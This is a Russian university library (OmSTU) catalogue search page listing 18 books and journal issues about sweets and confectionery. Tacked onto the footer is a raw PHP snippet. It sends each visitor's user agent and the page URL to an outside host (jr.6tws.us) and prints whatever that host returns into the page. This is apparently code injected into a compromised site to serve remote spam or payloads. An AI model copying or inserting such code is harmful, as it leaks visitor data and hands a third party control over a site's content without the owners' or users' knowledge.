Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

111 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СЛАДОСТИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 18
1. 
Хаят, Давид. Антираковая диета: Продукты, которые мы должны есть, чтобы защититься от опасного недуга [Текст] / Д. Хаят ; пер. О. А. Кутумина, 2017. - 285, [] с.
Держатели документа (Информация об экземплярах) 
2. 
Табаторович, Александр Николаевич. Товароведение однородных групп продовольственных товаров (зерномучные и кондитерские товары) [Текст] / А. Н. Табаторович ; дар. А. Н. Табаторович, 2017. - 183 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей зерномучных и кондитерских товаров. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов, обучающихся по направлениям подготовки 38.03.07 "Товароведение" и 38.03.06 "Торговое дело". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением указанных групп товаров.

Полный текст
3. 
Товароведение и экспертиза потребительских товаров [Текст] / В. В. Шевченко [и др.] ; рук. работы В. В. Шевченко, 2014. - 751 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ЭКСПЕРТИЗА ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СОСТАВ ХИМИЧЕСКИЙ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ВОДА -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- УГЛЕВОДЫ -- ЛИПИДЫ -- ЖИРЫ -- ЛИПОИДЫ -- ВЕЩЕСТВА АЗОТСОДЕРЖАЩИЕ -- ВИТАМИН -- ФЕРМЕНТ -- КИСЛОТА ОРГАНИЧЕСКАЯ -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПЛОДЫ СВЕЖИЕ -- ЯГОДЫ -- ОРЕХИ -- ОВОЩИ -- ТОВАРЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ВИНО ВИНОГРАДНОЕ -- БРЕНДИ -- КОНЬЯК -- ИЗДЕЛИЯ ТАБАЧНЫЕ -- КРАХМАЛ -- КРАХМАЛОПРОДУКТЫ -- САХАР -- ЗАМЕНИТЕЛЬ САХАРА -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- СЛАДОСТИ ВОСТОЧНЫЕ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- МОЛОКО -- КОНСЕРВЫ МОЛОЧНЫЕ -- СЫР -- МАСЛО -- МОРОЖЕНОЕ -- ЖИРЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ ПИЩЕВЫХ ЖИРОВ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИР ТОПЛЕНЫЙ -- МАРГАРИН -- МАЙОНЕЗ -- ТОВАРОВЕДЕНИЕ МЯСНЫХ ПРОДУКТОВ -- МЯСО -- МЯСО ПТИЦЫ -- КОНСЕРВЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ РЫБНЫХ ПРОДУКТОВ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ИКРА -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- МОРЕПРОДУКТЫ
Держатели документа (Информация об экземплярах) 
4. 
Могильный, Михаил Петрович. Восточные сладости (технология, рецептура, рекомендации) [Текст] / М. П. Могильный ; дар. В. В. Арсеньев, 2002. - 147 с.
Держатели документа (Информация об экземплярах) 
5. 
Экология и жизнь. - Журнал, 2009г. № 7/8
Оглавление 
  • Прошкина, И. Поверните лицо к солнцу / И. Прошкина. - с.30-31 : ил.
  • Самсонов, А. Л. Барьер эффективности и "зеленый коридор" сотрудничества / А. Л. Самсонов. - с.32-36 : ил.
  • Либин, Э. От кризиса к кризису / Э. Либин, О. Фиговский. - с.37-40 : ил.
  • Горц, А. Экология и кризис / А. Горц. - с.41-45 : ил.
  • Кузнецов, И. "Северный поток": маршрут безопасности / И. Кузнецов. - с.48-49 : ил.
    Кл. слова: Nord Stream
  • Всемирная конференция ЮНЕСКО в Бонне. - с.62-64 : ил.
  • Потяева, Т. И. Молодежь сохраняет природное наследие / Т. И. Потяева. - с.65-66 : ил.
    Кл. слова: Молодежный экологический форум
  • Гереню, А. Л. Зеленый газон на автозаправке / А. Л. Гереню. - с.67-71 : ил.
  • Солоьева, Е. А. Береги свою планету, ведь другой, похожей, нету! / Е. А. Солоьева. - с.72-74 : ил.
    Кл. слова: Районный библиотечный экологический фестиваль
  • Коваленко, Н. Д. Жемчужницы / Н. Д. Коваленко. - с.75-79 : ил.
    Кл. слова: Моллюск, Жемчуг, Искусственное выращивание жемчуга
  • Большаков, В. Н. Управлять природой - значит беречь ее / В. Н. Большаков, А. А. Лущекина, В. М. Неронов. - с.80-87 : ил.
    Кл. слова: 12 принципов экосистемного подхода
  • Каздым, А. А. Техногенная опасность... из космоса / А. А. Каздым. - с.98-102 : ил.
    Кл. слова: Космический мусор
  • Елдышев, Ю. Н. Что таит тающая Арктика / Ю. Н. Елдышев. - с.103-105 : ил.
  • Зенин, В. В. Тяжелый металл / В. В. Зенин [и др.]. - с.108-113 : ил.
    Другие авторы: Осенков В. Н., Рягузов А. В., Федянин В. И., Хишко О. В.
    Кл. слова: Полигон ТБО
  • Семинар в Ясной Поляне. - с.117-119 : ил.
    Кл. слова: Музей-усадьба "Ясная Поляна"
  • Кудинов, К. А. Заповедные Жигули / К. А. Кудинов, Ю. П. Краснобаев. - с.120-125 : ил.
    Кл. слова: Средне-Волжский комплексный биосферный резерват
  • Кузнецов, И. Жажда мегаполисов / И. Кузнецов. - с.126-129 : ил.
  • Владимиров, И. Водные проекты России / И. Владимиров. - с.130-134 : ил.
    Кл. слова: Тихвинская водная система, Волго-Балтийский водный путь, Беломорско-Балтийский канал
  • Ревич, Б. А. "Горячие точки" / Б. А. Ревич. - с.136-141 : ил.
  • Передерин, В. Добрый камень за пазухой / В. Передерин. - с.142-144 : ил.
    Кл. слова: Люди и камни, Стоунтерапия
  • Кузнецов, И. Сладости на пользу / И. Кузнецов. - с.145-151 : ил.
    Кл. слова: Рецепты пастилы, зефира, халвы, Пастила, Зефир
  • Петров, А. А. Школа Моисеева / А. А. Петров. - с.5-9 : фот.
    Кл. слова: Моисеев Н. Н.
  • Кудрин, В. Б. Живое число философа А. Лосева / В. Б. Кудрин. - с.26-29 : рис.
    Кл. слова: Лосев А. Ф.
6. 
Кондитерское и хлебопекарное производство. - Журнал, 2006г. № 10
Оглавление 
  • Бакуменко, О. Е. Зерновой крекер, обогащенный пищевыми волокнами / О. Е. Бакуменко, А. Ф. Доронин, Ю. М. Плаксин. - с.1
  • Корячкина, С. Я. Совершенствование технологии выработки хлеба из целого зерна злаковых культур / С. Я. Корячкина, Е. А. Кузнецова, Ю. В. Гончаров. - с.3-6
  • Бойцова, Е. Е. Применение жиров "СОЮЗ" при производстве конфет "Ассорти" / Е. Е. Бойцова, Л. И. Степанова. - с.8-9
  • Васькина, В. А. Влияние фритюрных масел на качество сладости "Чак-чак" / В. А. Васькина, Н. А. Байтерякова, Д. В. Руденицкий. - с.10-12
  • Ливинский, А. А. Совершенствование технологии производства мучных кондитерских изделий / А. А. Ливинский. - с.14
  • Бороденкова, М. С. Жиры для производства глазури / М. С. Бороденкова. - с.15-16
Держатели документа (Информация об экземплярах) 
7. 
Пищевая промышленность. - Журнал, 2007г. № 5
Оглавление 
  • Пищевые волокна в продуктах питания. - с.8-10
    Кл. слова: ВОЛОКНО ПИЩЕВОЕ, ПРОДУКТЫ ПИТАНИЯ
  • Смирнов, Е. В. Экстракты и ароматизаторы ванили / Е. В. Смирнов. - с.14-17
    Кл. слова: ВАНИЛЬ
  • Евелева, В. В. Полифункциональная пищевая добавка "Дилактин - S" / В. В. Евелева, И. Б. Новицкая, В. М. Диденко. - с.18-20
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Ван, Моурик С. В. В фокусе сладости: сладкая альтернатива / Моурик С. В. Ван. - с.24-25
    Кл. слова: СЛАДОСТИ
  • Яшин, А. Я. Определение содержания природных антиоксидантов в пищевых продуктах и БАДах / А. Я. Яшин, Н. И. Черноусова. - с.28-30
    Кл. слова: БАД, ПРОДУКТЫ ПИЩЕВЫЕ, АНТИОКСИДАНТЫ
  • Баулина, О. Н. Развитие пищевых технологий: использование растительных экстрактов / О. Н. Баулина. - с.32-33
    Кл. слова: экстракт растительный
  • Колесников, В. А. Производство функциональных продуктов питания с использованием пищевых свекловичных волокон / В. А. Колесников, А. И. Артеменко, М. В. Лукьяненко. - с.34-35
    Кл. слова: ВОЛОКНО ПИЩЕВОЕ
  • Николаенко, О. Ю. Соевые проростки и их использование / О. Ю. Николаенко, В. П. Корчагин. - с.36-37
    Кл. слова: СОЯ
  • Кайшев, В. Г. Анализ макроэкономических показателей развития пищевой и перерабатывающей промышленности Российской Федерации за 1995 - 2006 гг. / В. Г. Кайшев. - с.42-45
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ - СТА, ПРОМЫШЛЕННОСТЬ ПЕРЕРАБАТЫВАЮ
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь - февраль 2007 г.. - с.46-47
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ - СТА, ПРОМЫШЛЕННОСТЬ ПЕРЕРАБАТЫВАЮ
  • Турушин, Ю. В. Мониторинг состояния и развития предприятий пищевой промышленности / Ю. В. Турушин. - с.48-49
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ
  • Чичельницкий, Е. Ю. Внешний рынок мясной, молочной и рыбной продукции / Е. Ю. Чичельницкий. - с.50-52
    Кл. слова: РЫНОК МОЛОЧНОЙ ПРОДУКЦИИ, РЫНОК МЯСНОЙ ПРОДУКЦИИ , РЫНОК РЫБЫ
  • Шаматов, И. К. Российский рынок сахара: сегодня и завтра / И. К. Шаматов, Р. А. Сулейманов. - с.53
    Кл. слова: рынок сахара
  • Алексеева, Е. В. Совершенствование организационной структуры системы управления качеством и безопасностью / Е. В. Алексеева. - с.72-73
    Кл. слова: УПРАВЛЕНИЕ КАЧЕСТВОМ, УПРАВЛЕНИЕ БЕЗОПАСНОСТЬЮ
  • Касьяненко, А. Успех партнерства промышленности и государственных организаций в области пищевой безопасности (опыт Канады) / А. Касьяненко, С. Оболенский, С. Джойл. - с.74-75
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВАЯ - КАНАДА
  • Новоселов, Я. Б. Мониторинг рынка БАД к пище и специализированных продуктов питания / Я. Б. Новоселов, А. Р. Антонов. - с.76-77
    Кл. слова: БАД
Держатели документа (Информация об экземплярах) 
8. 
Питание и общество. - Журнал, 2010г. № 6
Оглавление 
  • Забнев, Сергей. Улун / С. Забнев. - с.11
  • Юшкова, А. О стратегии маркетинга / А. Юшкова. - с.12
  • Кучер, Л. Дипломатический протокол и этикет / Л. Кучер. - с.12-13
  • Арефьева, Анастасия. Я памятник тебе воздвиг, но рукотворный... / А. Арефьева. - с.14-15
  • Начало начал. - с.19
  • Ковалев, В. Холодные супы / В. Ковалев. - с.22
  • Филонов, М. Самый ранний овощ / М. Филонов. - с.23
  • Любина, Анастасия. Полезные сорняки-первоцветы / А. Любина. - с.24-25
  • Любина, Анастасия. Кардамон / А. Любина. - с.26
  • Пряные апельсины. - с.26
  • Арефьева, Анастасия. Восточные сладости / А. Арефьева. - с.27
  • Киреевский, Игорь. Азиатский десерт в меню Александра Македонского / И. Киреевский. - с.28
  • Ковалев, Н. И. Напитки русского стола / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - с.29
  • Киреевский, Игорь. Вечера на хуторе близ Диканьки / И. Киреевский. - с.30
  • "Земляничная поляна - солнца свет... ". - с.32
9. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : учебник / Н. Г. Бутейкис, 2012. - 335 с.
Держатели документа (Информация об экземплярах) 
10. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : учебник / Н. Г. Бутейкис, А. А. Жукова, 2007. - 300 с.
Держатели документа (Информация об экземплярах) 
11. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
12. 
Товароведение зерномучных и кондитерских товаров [Текст] : Учебник гриф-МО / И. П. Салун, Н. А. Смирнова, Е. А. Воробьева, 1981. - 344 с.
Держатели документа (Информация об экземплярах) 
13. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

14. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : Учеб. / Н. Г. Бутейкис, А. А. Жукова, 2001. - 300 с.
Держатели документа (Информация об экземплярах) 
15. 
Сборник основных рецептур сахаристых кондитерских изделий [Текст] : сборник / Сост. Н. С. Павлова, 2003. - 230 с.
Держатели документа (Информация об экземплярах) 
16. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
17. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : Учеб. / Н. Г. Бутейкис, А. А. Жукова, 2003. - 300 с.
Держатели документа (Информация об экземплярах) 
18. 
Шилова, Юлия Витальевна. Сладости ада, или Роман обманутой женщины [Текст] : Роман / Ю. В. Шилова, 2005. - 347, [1] с.
Ключевые слова 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2998 - 25.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.25 с.20 запросов, 0.73c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;